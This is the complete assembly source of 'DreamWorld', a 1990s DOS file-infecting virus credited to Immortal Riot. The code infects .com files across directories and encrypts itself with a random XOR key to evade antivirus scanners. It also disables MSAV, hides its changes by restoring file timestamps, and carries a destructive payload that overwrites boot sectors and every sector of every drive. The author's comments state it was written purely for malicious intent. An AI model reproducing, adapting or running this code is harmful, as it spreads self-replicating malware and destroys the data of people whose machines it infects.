; -DreamWorld?- ; "Created by Immortal Riot's destructive development team" ; (c) 93/94 Immortal Riot - All rights reserved ; ; Dedication: ; "If Metal Militia was dead, this virus should be deadicated to him" ; ; Notes: ; This was 'written' in one day. It sucks, but not as good as my.. ; ahh.. now I remember, I don't got a girl-friend, but my "girl-friend" ; think she got a boy-friend? Huh? She's nuts! ; ; Notes_II: ; F-Prot, Scan, TBAV, FindViru can't find shits of this code. ; ; Disclaimer: ; Well, I just gotta have one, you know. So, I hereby claim this: ; "I take no responsability for any damage, either direct or implied, ; caused by the usage of the virus source code or of the resulting code ; after assembly. No warrant is made about the product functionability ; or quality. The code was written in pure educational purposes ONLY." ; ; Truth: ; Well, this was written only for malicious intends. I havn't learned ; a shit by writing this shit. Now you know that.. Well, I just had ; some hours spare time, and a huge appetite for destruction. That's why ; this virus was created. No more, no less. Ciao! /The Unforgiven .model tiny ; .code ; org 100h ; ; Start: ; db 0e9h ; Jump to start1 and mark this file DW 0 ; as virus-infected! ; Start1: ; xchg ax,ax ; It's simply two NOPs nop ; ; mov ax,0fa01h ; Let's un-install MSAV junk program mov dx,5945h ; from memory for a cost of 8 bytes :) int 16h ; ; call get_delta ; Get the delta offset get_delta: ; pop bp ; sub bp, offset get_delta ; ; Call_en_de_crypt: ; Well, just using alternitive code mov ax,bp ; for a "call en_de_crypt", for satisfying add ax,011dh ; my very sick brain.. push ax ; jmp short en_de_crypt ; jmp short real_code_start ; Sneee! ; crypt_val dw 0 ; We get a random value for each encryption! ; Write_virus: ; call en_de_crypt ; Encrypt virus before we write! mov ah,65d ; 65d - 1d = 40HEX! sub ah,1d ; ^^^ How meaningless! mov cx, end_of_virus - start1 ; CX = bytes to write lea dx, [bp+start1] ; ; DX = Where to write from (100h) int 21h ; ; Duh! ; call en_de_crypt ; Decrypt virus again ret ; ; En_de_crypt: ; Heuristic, Heuristic, eat this! ; mov ax,word ptr [bp+crypt_val] lea si,[bp+encrypt_start] ; mov cx,(end_of_virus-start1+1)/2 ; Xor_loop: ; xor word ptr [si],ax ; Encrypting two bytes/loop, until add si,2 ; all the code between encryption_start loop xor_loop ; to end_of_virus is encrypted! ret ; ; Encrypt_start: ; All code here and below is encrypted, Real_code_start: ; making it hard for heuristic scanners! ; mov ah,2ah ; First, we check for what date it is int 21h ; cmp dl,31 ; Is it the 31st any month? jne not_now ; Nop! ; Cruel: ; mov ah,09h ; It's the 31st any month! lea dx,[bp+v_name] ; or the 1/100 of a second = 1 int 21h ; we'll print a message! ; mov al,2h ; and after that, we'll brutally mov cx,1 ; overwrite the first-sector on lea bx,v_name ; drive C: with our virus name! cwd ; int 26h ; ; Not_now: ; It wasn't the 31:st, so, mov ah,2ch ; we'll take a random number int 21h ; from a 1/100 of a second and if cmp dl,1 ; the value is 1, we'll trash the je cruel ; boot-sector on drive C: and if cmp dl,98 ; the value is 99 we will brutally jbe no_harm ; destroy all sectors on all drives. ; Trash_sucker: ; mov al,2h ; We'll start on drive C: (2h) Drive: ; We'll overwrite one sector/run! mov cx,1 ; with our virus name, and we'll lea bx,v_name ; write from sector one, with the xor dx,dx ; very nice interrupt 26h (sector write!) Next_Sector: ; and after we've written one sector we'll int 26h ; jump to the next sector and overwrite inc dx ; that too, and loop until all sectors are jnc next_sector ; being overwritten, then, we'll jump to inc al ; the next drive, and overwrite all sectors jmp short drive ; there as well. And the next drive, and ; the next.. :-). No_Harm: ; lea dx,[bp+offset dta] ; Set the DTA to variable called DTA call set_dta ; (DTA=42 byte chunk of memory!) ; Buf_Xfer: ; Restore the beginning.. lea si, [bp+offset org3] ; mov di, 100h ; DI=100h push di ; Store di with our new value. movsw ; Move string by word (the first two bytes!) movsb ; Move string by byte (the third byte in the ; buffer), b'cos our org3 buffer is 3 bytes! ; Get_drive: ; mov ah,19h ; We'll get the drive from were we're executed int 21h ; from, and if an infected file is being run cmp al,2 ; from A: or B: we'll not search for more files jae Get_dir ; to infect b'cos we havn't got a int24 handler. ret ; Let the infected files run normally! ; Get_dir: ; Get directory from where we're being executed mov ah,47h ; from. Must do that b'cos we're using the sub dl,dl ; dot-dot method to travel around! lea si,[bp+end_of_virus+2ch]; int 21h ; ; Findfirst: ; mov ah, 4eh ; FindFirst file lea dx, [bp+masker] ; with the extension of 'COM' _4fh: ; When called ah=4fh (findnextfile) int 21h ; jnc open_file ; We found a file! ; Then, open it! Chdir: ; mov ah,3bh ; We didn't find any files lea dx,[bp+offset dot_dot] ; in the current dir, so we'll move int 21h ; to the ".." location in the tree and jc quit ; search for more files, if location doesn't jmp short findfirst ; exist (ax=03h), we'll quit, otherwise, we'll ; search for the first file in the new dir. Open_file: ; mov ax, 3D02h ; Open the file in read/write mode lea dx, [bp+offset dta+1eh] ; Filename is located in DTA at offset 1Eh int 21h ; xchg ax, bx ; Faster/bigger than mov BX,AX ; mov ax,5700h ; Take the file's time/date int 21h ; (ah=57h = get/set time/date) ; (al=01h = get time/date) push cx ; Store time! push dx ; Store date! ; mov cx, 3 ; Read first three bytes of the file lea dx, [bp+org3] ; to the buffer (org3) mov ah, 3fh ; int 21h ; ; Check if already infected mov cx, word ptr [bp+ORG3+1]; mov ax, word ptr [bp+DTA+1ah] add cx, end_of_virus - start1 + 3 cmp ax, cx ; jz restore_time_date ; It's already infected! ; No, it's not infected! sub ax, 3 ; mov word ptr [bp+writebuffer], ax ; xor al, al ; Then, we'll move the file-poiter to call f_ptr ; the beginning of the file, and mov cx, 3 ; Write three bytes (our own jmp) lea dx, [bp+e9] ; mov ah, 40h ; int 21h ; ; mov al, 2 ; Then, we'll move the file-pointer to call f_ptr ; end_of_file. ; Get_Random: ; mov ah,2ch ; Darn, this little trick is really int 21h ; cool, b'cos we'll not get the same add dl, dh ; encryption-value on any infected file, jz get_random ; resulting in no bytes except the one used mov word ptr [bp+crypt_val],dx; for the decrypt routine remains constant! ; call write_virus ; Now, write the virus! ; Restore_time_date: ; Cover our tracks.. pop dx ; Restore file date! pop cx ; Restore file time! ; Notice the order "push cx/dx pop dx/cx!" mov ax,5701h ; ah=57h (get/set attribs), int 21h ; al=01h (set attribs) ; Close_file: ; mov ah, 3eh ; Close the file, int 21h ; which now is infected! ; mov ah, 4fh ; This little trick, is really jmp short _4fh ; really neat, I think.. ; Quit: ; lea dx,[bp+end_of_virus+2ch]; First, we'll change back to the mov ah,3bh ; directory from where we were executed int 21h ; ; Fix_it: ; mov dx, 80h ; Then, we'll set back the DTA to its ; default value (note- this is NOT used ; when the virus is running!) Set_dta: ; mov ah, 1ah ; Set the dta, used twice in this virus, int 21h ; one when we started, and now, when we're ; ready! Exit: ; Then, we'll return and execute retn ; the "real" program! ; F_ptr: ; Since we moved the file-pointer to mov ah, 42h ; end of file twice, this saves some xor cx, cx ; bytes! cwd ; Clear dx (smallest variant!) int 21h ; retn ; Return to caller! ; V_name db '[DreamWorld?]','$' ; It's the name for the virus dream db '"I have a dream..."'; Me and Martin Luther King! msg db 'Copy me, so I can travel around the globe!' db 'Spreading my message, manipulating your' db 'thoughts, your mind, and your actions' db '"Love, Peace, Empathy!"' copyr db "(c) 93/94 Immortal Riot - All rights reserved!" Dot_dot db '..',0 Masker db '*.com',0 Org3 db 0cdh, 20h, 0 ; original three bytes saved here E9 db 0e9h ; the jmp End_of_virus equ $ Writebuffer dw ? ; Scratch area for the JMP Dta db 42 dup (?) ; 42 bytes of chunk in memory, but ; not in the files! Virus_end: end start